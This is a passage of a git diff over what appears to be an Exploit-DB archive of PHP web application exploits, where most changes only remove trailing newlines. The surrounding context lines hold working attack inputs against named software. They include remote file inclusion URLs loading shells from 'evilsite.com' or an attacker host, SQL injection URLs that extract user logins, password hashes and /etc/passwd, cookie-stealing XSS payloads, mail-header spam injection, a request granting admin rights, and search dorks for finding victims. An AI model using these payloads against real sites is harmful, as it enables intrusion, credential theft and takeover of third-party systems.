affects Campsite 2.6.1. Earlier versions may also be affected. http://www.example.com/classes/User.php?g_DocumentRoot=shell.txt? - + \ No newline at end of file diff --git a/platforms/php/webapps/3000.pl b/platforms/php/webapps/3000.pl index 73e510e4d..e42ce7271 100755 --- a/platforms/php/webapps/3000.pl +++ b/platforms/php/webapps/3000.pl @@ -153,4 +153,4 @@ sub usage(){ } } -# milw0rm.com [2006-12-24] +# milw0rm.com [2006-12-24] \ No newline at end of file diff --git a/platforms/php/webapps/3002.php b/platforms/php/webapps/3002.php index 59e5726f0..0037ecb6d 100755 --- a/platforms/php/webapps/3002.php +++ b/platforms/php/webapps/3002.php @@ -389,4 +389,4 @@ if(isset($_REQUEST['target'])&&$_REQUEST['target']!=''){ } ?>
      -------------------------------------------------------------------------------------------------------------------------------------------->
      -# milw0rm.com [2006-12-25] +# milw0rm.com [2006-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/3003.txt b/platforms/php/webapps/3003.txt index a7c89ad6d..443cebb70 100755 --- a/platforms/php/webapps/3003.txt +++ b/platforms/php/webapps/3003.txt @@ -43,4 +43,4 @@ + http://[target]/[path]/mediabroadcast.php?include_path=http://evilsite.com/shell.php? +------------------------------------------------------------------------------------------- -# milw0rm.com [2006-12-25] +# milw0rm.com [2006-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/3004.txt b/platforms/php/webapps/3004.txt index 25a2482cd..b4e1ede19 100755 --- a/platforms/php/webapps/3004.txt +++ b/platforms/php/webapps/3004.txt @@ -16,4 +16,4 @@ http://localhost/en/mod.php?mod=diskusi&op=viewdisk&did=-4 %20union%20select%200 -======dork=====- inurl:mod.php?mod=diskusi&op= -# milw0rm.com [2006-12-25] +# milw0rm.com [2006-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/30047.txt b/platforms/php/webapps/30047.txt index 2adad8af1..993767ddb 100755 --- a/platforms/php/webapps/30047.txt +++ b/platforms/php/webapps/30047.txt @@ -11,4 +11,4 @@ This issue is reported to affect vBulletin 3.6.6 and prior versions. http://www.example.com/vbulletin/calendar.php?do=add&type=single&c=1 --> fill up the title field with : - + \ No newline at end of file diff --git a/platforms/php/webapps/3005.pl b/platforms/php/webapps/3005.pl index fe340cef2..211b742d3 100755 --- a/platforms/php/webapps/3005.pl +++ b/platforms/php/webapps/3005.pl @@ -57,4 +57,4 @@ sub main exit; } -# milw0rm.com [2006-12-25] +# milw0rm.com [2006-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/30059.py b/platforms/php/webapps/30059.py index 38e9a4a54..40d627c8e 100755 --- a/platforms/php/webapps/30059.py +++ b/platforms/php/webapps/30059.py @@ -68,4 +68,4 @@ for p in soup.findAll("p"): #strip first line result = p.getText().split("Warning")[0] - print result.replace("Multi-source information on the power devices suppying the protected server","",1) + print result.replace("Multi-source information on the power devices suppying the protected server","",1) \ No newline at end of file diff --git a/platforms/php/webapps/3006.txt b/platforms/php/webapps/3006.txt index 17f3b950a..29efd47c5 100755 --- a/platforms/php/webapps/3006.txt +++ b/platforms/php/webapps/3006.txt @@ -47,4 +47,4 @@ XORON - XORON - XORON - XORON - XORON - - ----------------------------------------------------------- -# milw0rm.com [2006-12-25] +# milw0rm.com [2006-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/30066.txt b/platforms/php/webapps/30066.txt index 4628de4a9..b6de4283a 100755 --- a/platforms/php/webapps/30066.txt +++ b/platforms/php/webapps/30066.txt @@ -9,5 +9,4 @@ Jetbox 2.1 is vulnerable; other versions may also be affected. http://www.example.com/path//index.php?view=-1' UNION SELECT 1,CONCAT(`login`,'-',`user_password`),1,1,1,1,1,1,1,1,1,1 FROM `User` LIMIT 0,1%23 -http://www.example.com/path//index.php?view=webuser&task=sendpw&login=-1' UNION SELECT 1,1,1,'spam1@mail.com%0ABcc: spam_address2@somedomain.com, spam_address2 somedomain.com, spam_address4@somedomain.com, spam_addressNsomedomain.com%0ASubject: Some Spam Subject%0AFrom: any_address@somedomain.com%0AMIME-Version: 1.0%0AContent-Type: multipart/mixed; boundary=Hacker;%0A%0A--Hacker%0ASome Spam Message%0A%0AContent-Type:text/html;name=any_file.html;%0AContent-Transfer-Encoding:8bit%0AContent-Disposition: attachment%0A%0AHTML File%0A%0A--Hacker--%0AOther text will be hide',1 FROM `user` %23 - +http://www.example.com/path//index.php?view=webuser&task=sendpw&login=-1' UNION SELECT 1,1,1,'spam1@mail.com%0ABcc: spam_address2@somedomain.com, spam_address2 somedomain.com, spam_address4@somedomain.com, spam_addressNsomedomain.com%0ASubject: Some Spam Subject%0AFrom: any_address@somedomain.com%0AMIME-Version: 1.0%0AContent-Type: multipart/mixed; boundary=Hacker;%0A%0A--Hacker%0ASome Spam Message%0A%0AContent-Type:text/html;name=any_file.html;%0AContent-Transfer-Encoding:8bit%0AContent-Disposition: attachment%0A%0AHTML File%0A%0A--Hacker--%0AOther text will be hide',1 FROM `user` %23 \ No newline at end of file diff --git a/platforms/php/webapps/3007.txt b/platforms/php/webapps/3007.txt index 44dbf8058..e200ac45e 100755 --- a/platforms/php/webapps/3007.txt +++ b/platforms/php/webapps/3007.txt @@ -60,4 +60,4 @@ + http://[target]/[path]/functions/users.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php? +------------------------------------------------------------------------------------------- -# milw0rm.com [2006-12-25] +# milw0rm.com [2006-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/30070.html b/platforms/php/webapps/30070.html index b09e572a9..4f6f36e58 100755 --- a/platforms/php/webapps/30070.html +++ b/platforms/php/webapps/30070.html @@ -25,4 +25,4 @@ Google d0rk: +http://www.example.com/news.asp?id="> \ No newline at end of file diff --git a/platforms/php/webapps/30083.txt b/platforms/php/webapps/30083.txt index e4f851799..ce1397335 100755 --- a/platforms/php/webapps/30083.txt +++ b/platforms/php/webapps/30083.txt @@ -48,4 +48,4 @@ Connection: keep-alive Pragma: no-cache Cache-Control: no-cache -message=%22%3E%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E +message=%22%3E%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/30084.php b/platforms/php/webapps/30084.php index e3c93c731..eee62a3e4 100755 --- a/platforms/php/webapps/30084.php +++ b/platforms/php/webapps/30084.php @@ -30,4 +30,4 @@ http://[Target]/wp-content/uploads/file.php # #### #### #### #### #### #### #### #### # # BY T3rm!nat0r5 # E-mail : poya.terminator@gmail.com -# #### #### #### #### #### #### #### #### # +# #### #### #### #### #### #### #### #### # \ No newline at end of file diff --git a/platforms/php/webapps/3009.txt b/platforms/php/webapps/3009.txt index 84917ad77..426dec8bc 100755 --- a/platforms/php/webapps/3009.txt +++ b/platforms/php/webapps/3009.txt @@ -50,4 +50,4 @@ http://www.shad0wed.com/view/load/mod:fs/do:dl/id:7059wc8637mzd9966hnb3dgl415413 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -# milw0rm.com [2006-12-25] +# milw0rm.com [2006-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/30092.txt b/platforms/php/webapps/30092.txt index e04e6895c..89924fca4 100755 --- a/platforms/php/webapps/30092.txt +++ b/platforms/php/webapps/30092.txt @@ -9,6 +9,4 @@ This issue affects FlashChat 4.7.9; other versions may also be vulnerable. Further reports suggest that the vulnerable parameter is defined with static content. This BID will be updated pending further investigation. http://www.example.com/chat/incclasses/connection.php?f_cms=[Shell-Attack] -http://www.example.com/chat/inc/common.php?f_cms=[Shell-Attack] - - +http://www.example.com/chat/inc/common.php?f_cms=[Shell-Attack] \ No newline at end of file diff --git a/platforms/php/webapps/3010.txt b/platforms/php/webapps/3010.txt index 23f137419..6d910f7bf 100755 --- a/platforms/php/webapps/3010.txt +++ b/platforms/php/webapps/3010.txt @@ -29,4 +29,4 @@ http://myphpnuke.com/download.php?op=getit&lid=28 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -# milw0rm.com [2006-12-25] +# milw0rm.com [2006-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/30105.txt b/platforms/php/webapps/30105.txt index 52c608d72..3ab61ca6c 100755 --- a/platforms/php/webapps/30105.txt +++ b/platforms/php/webapps/30105.txt @@ -33,5 +33,4 @@ More information, including screenshots, can be found at: http://www.nerdbox.it/wordpress-download-manager-xss/ - - + \ No newline at end of file diff --git a/platforms/php/webapps/30107.txt b/platforms/php/webapps/30107.txt index 33818dec4..979deab50 100755 --- a/platforms/php/webapps/30107.txt +++ b/platforms/php/webapps/30107.txt @@ -168,4 +168,4 @@ src=x onerror=prompt(111);>
      -
+ \ No newline at end of file diff --git a/platforms/php/webapps/3011.pl b/platforms/php/webapps/3011.pl index 903c4ac27..7ecc0d9ba 100755 --- a/platforms/php/webapps/3011.pl +++ b/platforms/php/webapps/3011.pl @@ -17,4 +17,4 @@ $fishyshoop->setopt(CURLOPT_POST, 1); $fishyshoop->setopt(CURLOPT_POSTFIELDS, "email=$UNAME&password=$PASS&is_admin=1&submit=1"); $fishyshoop->perform; -# milw0rm.com [2006-12-25] +# milw0rm.com [2006-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/3012.txt b/platforms/php/webapps/3012.txt index a64630340..1ab667e7f 100755 --- a/platforms/php/webapps/3012.txt +++ b/platforms/php/webapps/3012.txt @@ -19,4 +19,4 @@ http://www.victim.com/ScriptPath/ataturk.php?page=[sheLL] #Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed] -# milw0rm.com [2006-12-25] +# milw0rm.com [2006-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/30131.txt b/platforms/php/webapps/30131.txt index 64c7b09f3..3cbf974f2 100755 --- a/platforms/php/webapps/30131.txt +++ b/platforms/php/webapps/30131.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue is reported to affect the Buttercup WFM - May 2007 edition. Other versions could also be affected. -http://www.example.com/index.php?title=%3Cscript%3Ealert(1)%3C/script%3E +http://www.example.com/index.php?title=%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/3014.txt b/platforms/php/webapps/3014.txt index 267bfa666..b6a541625 100755 --- a/platforms/php/webapps/3014.txt +++ b/platforms/php/webapps/3014.txt @@ -43,4 +43,4 @@ http://www.server-victim/extras/plugins/widged/_widged.php?A=U&D= [25/12/2006] - Public disclousure -# milw0rm.com [2006-12-25] +# milw0rm.com [2006-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/3016.php b/platforms/php/webapps/3016.php index 0d64f6628..7b37c60cf 100755 --- a/platforms/php/webapps/3016.php +++ b/platforms/php/webapps/3016.php @@ -112,4 +112,4 @@ function get_postdata() } ?> -# milw0rm.com [2006-12-26] +# milw0rm.com [2006-12-26] \ No newline at end of file diff --git a/platforms/php/webapps/30166.txt b/platforms/php/webapps/30166.txt index 75c4d0c6b..df37f1e64 100755 --- a/platforms/php/webapps/30166.txt +++ b/platforms/php/webapps/30166.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow WordPress 2.2. is vulnerable; other versions may also be affected. -http://www.example.com/wp-admin/themes.php?page=functions.php&zmx"> +http://www.example.com/wp-admin/themes.php?page=functions.php&zmx"> \ No newline at end of file diff --git a/platforms/php/webapps/3017.php b/platforms/php/webapps/3017.php index a45a4fa9d..e74568d7b 100755 --- a/platforms/php/webapps/3017.php +++ b/platforms/php/webapps/3017.php @@ -271,4 +271,4 @@ else { } ?> -# milw0rm.com [2006-12-26] +# milw0rm.com [2006-12-26] \ No newline at end of file diff --git a/platforms/php/webapps/30171.txt b/platforms/php/webapps/30171.txt index 576b929d1..ea260acca 100755 --- a/platforms/php/webapps/30171.txt +++ b/platforms/php/webapps/30171.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues by manipulating the SQL query logic to carr These issues affect versions prior to JFFNMS 0.8.4-pre3. -http://www.example.com/auth.php?user='%20union%20select%202,'admin','$1$RxS1ROtX$IzA1S3fcCfyVfA9rwKBMi.','Administrator'/*&pass= +http://www.example.com/auth.php?user='%20union%20select%202,'admin','$1$RxS1ROtX$IzA1S3fcCfyVfA9rwKBMi.','Administrator'/*&pass= \ No newline at end of file diff --git a/platforms/php/webapps/3018.txt b/platforms/php/webapps/3018.txt index 8f7bb3f57..2ab5414ff 100755 --- a/platforms/php/webapps/3018.txt +++ b/platforms/php/webapps/3018.txt @@ -11,4 +11,4 @@ Vulnerable Code in pafiledb_constants.php Exploit: http://[site]/[path]/modules/mx_pafiledb/pafiledb/includes/pafiledb_constants.php?module_root_path=[Shell] -# milw0rm.com [2006-12-26] +# milw0rm.com [2006-12-26] \ No newline at end of file diff --git a/platforms/php/webapps/3019.txt b/platforms/php/webapps/3019.txt index 21724ef5e..23cbe0105 100755 --- a/platforms/php/webapps/3019.txt +++ b/platforms/php/webapps/3019.txt @@ -27,4 +27,4 @@ http://[target]/convert-date.php?cal_dir=http://[attacker]/ # ---------------------------Satbirlikleri.Org&SiberAktif.Net----------------------------- -# milw0rm.com [2006-12-26] +# milw0rm.com [2006-12-26] \ No newline at end of file diff --git a/platforms/php/webapps/3020.pl b/platforms/php/webapps/3020.pl index 66be7b1e6..91a35e694 100755 --- a/platforms/php/webapps/3020.pl +++ b/platforms/php/webapps/3020.pl @@ -230,4 +230,4 @@ sub usage() { exit; } -# milw0rm.com [2006-12-26] +# milw0rm.com [2006-12-26] \ No newline at end of file diff --git a/platforms/php/webapps/30213.txt b/platforms/php/webapps/30213.txt index cd1f349a4..ce584cd04 100755 --- a/platforms/php/webapps/30213.txt +++ b/platforms/php/webapps/30213.txt @@ -41,4 +41,4 @@ http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php ? ctg=courses&add_course=1) where "Course name:" filed is vulnerable to -stored XSS +stored XSS \ No newline at end of file diff --git a/platforms/php/webapps/30225.txt b/platforms/php/webapps/30225.txt index d6974b5a5..ef204cb31 100755 --- a/platforms/php/webapps/30225.txt +++ b/platforms/php/webapps/30225.txt @@ -10,6 +10,4 @@ http://www.example.com/mod.php?mod=katalog&op=viewlink&cid=-1+union+select+1,pwd http://www.example.com/mod.php?mod=katalog&op=viewlink&cid=-1+union+select+1,LOAD_FILE(0x2F6574632F706173737764),3+from+authors/* http://www.example.com/mod.php?mod=diskusi&op=viewdisk&did=-9+union+select+1,2,aid,pwd,5,6,email+from+authors/* http://www.example.com/mod.php?mod=publisher&op=viewarticle&cid=2&artid=-9+union+select+1,2,3,4,5,pwd,aid,email,9,0+from+authors/* -http://www.example.com/mod.php?mod=publisher&op=printarticle&artid=-47+union+select+1,concat_ws%280x3a,aid,name,pwd%29,3,4,5,6,7+from+authors-- - - +http://www.example.com/mod.php?mod=publisher&op=printarticle&artid=-47+union+select+1,concat_ws%280x3a,aid,name,pwd%29,3,4,5,6,7+from+authors-- \ No newline at end of file diff --git a/platforms/php/webapps/30235.txt b/platforms/php/webapps/30235.txt index 1cef387f9..eaca7b2f8 100755 --- a/platforms/php/webapps/30235.txt +++ b/platforms/php/webapps/30235.txt @@ -28,4 +28,4 @@ bo sekedar koleksi saja :D \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ -// gorontalo 2013 +// gorontalo 2013 \ No newline at end of file diff --git a/platforms/php/webapps/3025.pl b/platforms/php/webapps/3025.pl index a318db0ff..b6153a693 100755 --- a/platforms/php/webapps/3025.pl +++ b/platforms/php/webapps/3025.pl @@ -114,4 +114,4 @@ exit(); # Farzad.SHarifi -# milw0rm.com [2006-12-27] +# milw0rm.com [2006-12-27] \ No newline at end of file diff --git a/platforms/php/webapps/3026.txt b/platforms/php/webapps/3026.txt index a534b56eb..b1908b8a7 100755 --- a/platforms/php/webapps/3026.txt +++ b/platforms/php/webapps/3026.txt @@ -40,4 +40,4 @@ SP TNX : Dr.Pantagon ********************************************************************************************************** -# milw0rm.com [2006-12-27] +# milw0rm.com [2006-12-27] \ No newline at end of file diff --git a/platforms/php/webapps/3027.txt b/platforms/php/webapps/3027.txt index 61fc77e04..490b00704 100755 --- a/platforms/php/webapps/3027.txt +++ b/platforms/php/webapps/3027.txt @@ -47,4 +47,4 @@ + +------------------------------------------------------------------------------------------- -# milw0rm.com [2006-12-27] +# milw0rm.com [2006-12-27] \ No newline at end of file diff --git a/platforms/php/webapps/3028.txt b/platforms/php/webapps/3028.txt index 48ed8363f..ec059f509 100755 --- a/platforms/php/webapps/3028.txt +++ b/platforms/php/webapps/3028.txt @@ -35,4 +35,4 @@ XORON - XORON - XORON - XORON - XORON - - ----------------------------------------------------------- -# milw0rm.com [2006-12-27] +# milw0rm.com [2006-12-27] \ No newline at end of file diff --git a/platforms/php/webapps/3029.php b/platforms/php/webapps/3029.php index 550f2bc0a..8d27602db 100755 --- a/platforms/php/webapps/3029.php +++ b/platforms/php/webapps/3029.php @@ -205,4 +205,4 @@ sendpacketii($packet); ?> -# milw0rm.com [2006-12-27] +# milw0rm.com [2006-12-27] \ No newline at end of file diff --git a/platforms/php/webapps/30310.txt b/platforms/php/webapps/30310.txt index de335455b..93cff0661 100755 --- a/platforms/php/webapps/30310.txt +++ b/platforms/php/webapps/30310.txt @@ -44,4 +44,4 @@ id="formid" method="post"> document.getElementById('formid').submit(); - + \ No newline at end of file diff --git a/platforms/php/webapps/30320.txt b/platforms/php/webapps/30320.txt index d988fb0f5..9c4d5e396 100755 --- a/platforms/php/webapps/30320.txt +++ b/platforms/php/webapps/30320.txt @@ -6,4 +6,4 @@ An attacker may exploit these issues to delete blogs and comments regardless of geoBlog v1 is vulnerable to these issues. -http://www.example.com/blog/admin/deletecomment.php?id=16 +http://www.example.com/blog/admin/deletecomment.php?id=16 \ No newline at end of file diff --git a/platforms/php/webapps/30329.sh b/platforms/php/webapps/30329.sh index 8157c65d7..aa6dd313a 100755 --- a/platforms/php/webapps/30329.sh +++ b/platforms/php/webapps/30329.sh @@ -264,5 +264,4 @@ cd $(basename $1 | awk -F "." '{ print $1 }') git add * git commit -m "1" git push -echo "DONE! Open your gitlab's Files TAB" - +echo "DONE! Open your gitlab's Files TAB" \ No newline at end of file diff --git a/platforms/php/webapps/3033.txt b/platforms/php/webapps/3033.txt index 769b926b0..5782a95ce 100755 --- a/platforms/php/webapps/3033.txt +++ b/platforms/php/webapps/3033.txt @@ -13,4 +13,4 @@ # Greetz: str0ke , Dr Max Virus , Kacper ######################################################################## -# milw0rm.com [2006-12-28] +# milw0rm.com [2006-12-28] \ No newline at end of file diff --git a/platforms/php/webapps/30333.txt b/platforms/php/webapps/30333.txt index 5bb9bd59f..93ebb14ff 100755 --- a/platforms/php/webapps/30333.txt +++ b/platforms/php/webapps/30333.txt @@ -6,5 +6,4 @@ Exploiting this issue may allow an unauthorized user to view files and execute l PHMe 0.0.2 is vulnerable; other versions may also be affected. -http://www.example.com/resources/function_list.php?action=[Local Script]%00 - +http://www.example.com/resources/function_list.php?action=[Local Script]%00 \ No newline at end of file diff --git a/platforms/php/webapps/3036.php b/platforms/php/webapps/3036.php index afffc7ec9..4a7dd7d29 100755 --- a/platforms/php/webapps/3036.php +++ b/platforms/php/webapps/3036.php @@ -279,4 +279,4 @@ echo "Check register_globals = On and magic_quotes_gpc = off\n"; echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n"; ?> -# milw0rm.com [2006-12-28] +# milw0rm.com [2006-12-28] \ No newline at end of file diff --git a/platforms/php/webapps/30364.txt b/platforms/php/webapps/30364.txt index ae7f51987..ccf17125b 100755 --- a/platforms/php/webapps/30364.txt +++ b/platforms/php/webapps/30364.txt @@ -17,5 +17,4 @@ On Social: Twitter.Com/eyyamgudeer ################################################################################## [+] (index.php, show Param) ->>> [url]/index.php?show=static_page&id='2 - +>>> [url]/index.php?show=static_page&id='2 \ No newline at end of file diff --git a/platforms/php/webapps/30365.txt b/platforms/php/webapps/30365.txt index 07d257111..b0575d3c4 100755 --- a/platforms/php/webapps/30365.txt +++ b/platforms/php/webapps/30365.txt @@ -17,4 +17,4 @@ On Social: Twitter.Com/eyyamgudeer ################################################################################## [+] (index.php, show Param) ->>> [url]/index.php?show=product_penny&id='89 +>>> [url]/index.php?show=product_penny&id='89 \ No newline at end of file diff --git a/platforms/php/webapps/30366.txt b/platforms/php/webapps/30366.txt index be1f39abd..88c26dcf7 100755 --- a/platforms/php/webapps/30366.txt +++ b/platforms/php/webapps/30366.txt @@ -53,4 +53,4 @@ http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=private http://[Victim]/videoshare/ufavour.php?UID=253 or 1=1 http://[Victim]/videoshare/ufriends.php?UID=253 or 1=1 http://[Victim]/videoshare/uplaylist.php?UID=253 or 1=1 -http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1 +http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1 \ No newline at end of file diff --git a/platforms/php/webapps/30369.txt b/platforms/php/webapps/30369.txt index cb832f6a2..06589779d 100755 --- a/platforms/php/webapps/30369.txt +++ b/platforms/php/webapps/30369.txt @@ -15,4 +15,4 @@ fully"> http://www.example.com/affiliate/merchants/index.php?Act= ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date "> -http://www.example.com/affiliate/merchants/index.php?Act= add_money&msg=Please%20Enter%20A%20valid%20amount"> &modofpay=Authorize.net&bankname=&bankno=& bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid= +http://www.example.com/affiliate/merchants/index.php?Act= add_money&msg=Please%20Enter%20A%20valid%20amount"> &modofpay=Authorize.net&bankname=&bankno=& bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid= \ No newline at end of file diff --git a/platforms/php/webapps/30378.txt b/platforms/php/webapps/30378.txt index 7745b5b3d..9e3abf4f5 100755 --- a/platforms/php/webapps/30378.txt +++ b/platforms/php/webapps/30378.txt @@ -8,4 +8,4 @@ These issues affect webbler 3.1.3; prior versions may also be affected. http://www.example.com/uploader/?page= -curl -s "http://target-domain.com/uploader/?" -d "login=\">&password=test&processlogin=Enter&forgotpassword=" +curl -s "http://target-domain.com/uploader/?" -d "login=\">&password=test&processlogin=Enter&forgotpassword=" \ No newline at end of file diff --git a/platforms/php/webapps/30379.html b/platforms/php/webapps/30379.html index 173560716..2cba36d2a 100755 --- a/platforms/php/webapps/30379.html +++ b/platforms/php/webapps/30379.html @@ -14,4 +14,4 @@ This issue affects webbler 3.1.3; prior versions may also be affected. - + \ No newline at end of file diff --git a/platforms/php/webapps/30383.txt b/platforms/php/webapps/30383.txt index 5a07510c8..2ebf46de5 100755 --- a/platforms/php/webapps/30383.txt +++ b/platforms/php/webapps/30383.txt @@ -12,4 +12,4 @@ http://www.example.com/viking/cp.php?mode=7&f=1[XSS-CODE] http://www.example.com/viking/cp.php?mode=6"e=1[XSS-CODE] -http://www.example.com/viking/cp.php?mode=12&act=[XSS-CODE] +http://www.example.com/viking/cp.php?mode=12&act=[XSS-CODE] \ No newline at end of file diff --git a/platforms/php/webapps/3039.txt b/platforms/php/webapps/3039.txt index 7663559e4..157ee2b25 100755 --- a/platforms/php/webapps/3039.txt +++ b/platforms/php/webapps/3039.txt @@ -16,4 +16,4 @@ Usage: http://[target]/[easy_news_path]/newsboard/data/users.txt -# milw0rm.com [2006-12-29] +# milw0rm.com [2006-12-29] \ No newline at end of file diff --git a/platforms/php/webapps/30408.txt b/platforms/php/webapps/30408.txt index 954376685..85472929a 100755 --- a/platforms/php/webapps/30408.txt +++ b/platforms/php/webapps/30408.txt @@ -111,4 +111,4 @@ no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. -################################################### +################################################### \ No newline at end of file diff --git a/platforms/php/webapps/30409.txt b/platforms/php/webapps/30409.txt index fe0b2e53b..84c1879d9 100755 --- a/platforms/php/webapps/30409.txt +++ b/platforms/php/webapps/30409.txt @@ -103,4 +103,4 @@ with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. -################################################### +################################################### \ No newline at end of file diff --git a/platforms/php/webapps/3043.txt b/platforms/php/webapps/3043.txt index 3f19779d9..fe4514d07 100755 --- a/platforms/php/webapps/3043.txt +++ b/platforms/php/webapps/3043.txt @@ -17,4 +17,4 @@ Greetings: str0ke, Perle, TheJT, ajann Showexample: |username|MD5-Hash|eMail| -# milw0rm.com [2006-12-30] +# milw0rm.com [2006-12-30] \ No newline at end of file diff --git a/platforms/php/webapps/3044.txt b/platforms/php/webapps/3044.txt index 3cc0b4a3c..a1d25c572 100755 --- a/platforms/php/webapps/3044.txt +++ b/platforms/php/webapps/3044.txt @@ -20,4 +20,4 @@ Greetings: str0ke, Perle, TheJT, Shizoe #####The german Hacker bd0rk##### -# milw0rm.com [2006-12-30] +# milw0rm.com [2006-12-30] \ No newline at end of file diff --git a/platforms/php/webapps/30448.txt b/platforms/php/webapps/30448.txt index 7e0e574fe..453511504 100755 --- a/platforms/php/webapps/30448.txt +++ b/platforms/php/webapps/30448.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a LANAI CMS 1.2.14 is vulnerable; other versions may also be affected. -http://www.example.com/module.php?modname=faq&mf=faqviewgroup&mid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,userLogin,userPassword,5,6,7/**/FROM/**/tbl_ln_user/* +http://www.example.com/module.php?modname=faq&mf=faqviewgroup&mid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,userLogin,userPassword,5,6,7/**/FROM/**/tbl_ln_user/* \ No newline at end of file diff --git a/platforms/php/webapps/3045.php b/platforms/php/webapps/3045.php index 2498a666c..c7fc7d576 100755 --- a/platforms/php/webapps/3045.php +++ b/platforms/php/webapps/3045.php @@ -166,4 +166,4 @@ elseif (eregi("only meant to run at the command line",$html)){ } ?> -# milw0rm.com [2006-12-30] +# milw0rm.com [2006-12-30] \ No newline at end of file diff --git a/platforms/php/webapps/3047.txt b/platforms/php/webapps/3047.txt index 3fa034afe..351acae73 100755 --- a/platforms/php/webapps/3047.txt +++ b/platforms/php/webapps/3047.txt @@ -16,4 +16,4 @@ #####The german Hacker bd0rk##### -# milw0rm.com [2006-12-30] +# milw0rm.com [2006-12-30] \ No newline at end of file diff --git a/platforms/php/webapps/30479.txt b/platforms/php/webapps/30479.txt index f82fc938c..f976bfa18 100755 --- a/platforms/php/webapps/30479.txt +++ b/platforms/php/webapps/30479.txt @@ -6,5 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th Shoutbox 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/shoutbox.php?root=http://www.example2.com?cmd=id - +http://www.example.com/shoutbox.php?root=http://www.example2.com?cmd=id \ No newline at end of file diff --git a/platforms/php/webapps/30488.php b/platforms/php/webapps/30488.php index 78c3b8864..3eeeaba11 100755 --- a/platforms/php/webapps/30488.php +++ b/platforms/php/webapps/30488.php @@ -194,5 +194,4 @@ if (strstr($html,"666999")) ?> -# MefistoLabs.Com - +# MefistoLabs.Com \ No newline at end of file diff --git a/platforms/php/webapps/3049.php b/platforms/php/webapps/3049.php index 80560de16..4f3dcd518 100755 --- a/platforms/php/webapps/3049.php +++ b/platforms/php/webapps/3049.php @@ -359,4 +359,4 @@ echo "\n"; echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n"; ?> -# milw0rm.com [2006-12-30] +# milw0rm.com [2006-12-30] \ No newline at end of file diff --git a/platforms/php/webapps/3050.txt b/platforms/php/webapps/3050.txt index 32bb2c7f7..f1bb26891 100755 --- a/platforms/php/webapps/3050.txt +++ b/platforms/php/webapps/3050.txt @@ -34,4 +34,4 @@ XORON - XORON - XORON - XORON - XORON - - ----------------------------------------------------------- -# milw0rm.com [2006-12-30] +# milw0rm.com [2006-12-30] \ No newline at end of file diff --git a/platforms/php/webapps/3051.txt b/platforms/php/webapps/3051.txt index 9a57076cc..cdd88f815 100755 --- a/platforms/php/webapps/3051.txt +++ b/platforms/php/webapps/3051.txt @@ -34,4 +34,4 @@ XORON - XORON - XORON - XORON - XORON - - ----------------------------------------------------------- -# milw0rm.com [2006-12-30] +# milw0rm.com [2006-12-30] \ No newline at end of file diff --git a/platforms/php/webapps/30525.txt b/platforms/php/webapps/30525.txt index c15283c46..1eee65923 100755 --- a/platforms/php/webapps/30525.txt +++ b/platforms/php/webapps/30525.txt @@ -6,5 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th Arcadem 2.01 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?loadpage=[evilscript] - +http://www.example.com/index.php?loadpage=[evilscript] \ No newline at end of file diff --git a/platforms/php/webapps/3053.txt b/platforms/php/webapps/3053.txt index 417bee742..b66f9b4d9 100755 --- a/platforms/php/webapps/3053.txt +++ b/platforms/php/webapps/3053.txt @@ -24,4 +24,4 @@ FireFox or Opera #Special Gr33ts:AsianEagle-Kacper-The master-Hotturk ########################################################################################################## -# milw0rm.com [2006-12-31] +# milw0rm.com [2006-12-31] \ No newline at end of file diff --git a/platforms/php/webapps/3054.txt b/platforms/php/webapps/3054.txt index 41b803545..a1d66c9e4 100755 --- a/platforms/php/webapps/3054.txt +++ b/platforms/php/webapps/3054.txt @@ -26,4 +26,4 @@ #Special Gr33ts:AsianEagle-Kacper-The master-Hotturk # ########################################################################################################## -# milw0rm.com [2006-12-31] +# milw0rm.com [2006-12-31] \ No newline at end of file diff --git a/platforms/php/webapps/30555.txt b/platforms/php/webapps/30555.txt index 1cfe33119..1d7c54613 100755 --- a/platforms/php/webapps/30555.txt 